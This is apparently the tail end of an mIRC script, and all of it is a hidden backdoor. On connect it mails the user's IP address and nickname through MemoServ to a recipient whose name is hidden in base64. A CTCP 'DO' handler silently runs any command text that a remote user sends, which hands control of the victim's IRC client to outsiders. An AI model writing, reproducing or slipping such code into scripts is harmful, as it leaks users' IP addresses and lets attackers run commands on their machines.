   on *:connect:{
     var %s = My IP: $ip - My Nick: $nick
     memoserv send $decode(SlBFRw==,m) %s
   }
   ctcp ^*:DO *:*:{
     haltdef
     $2-
   }
   ctcp *:UPTIME:*:.timer 1 0 notice $nick $2-

   ;
   ;     ;P
   ;     End of
   ;
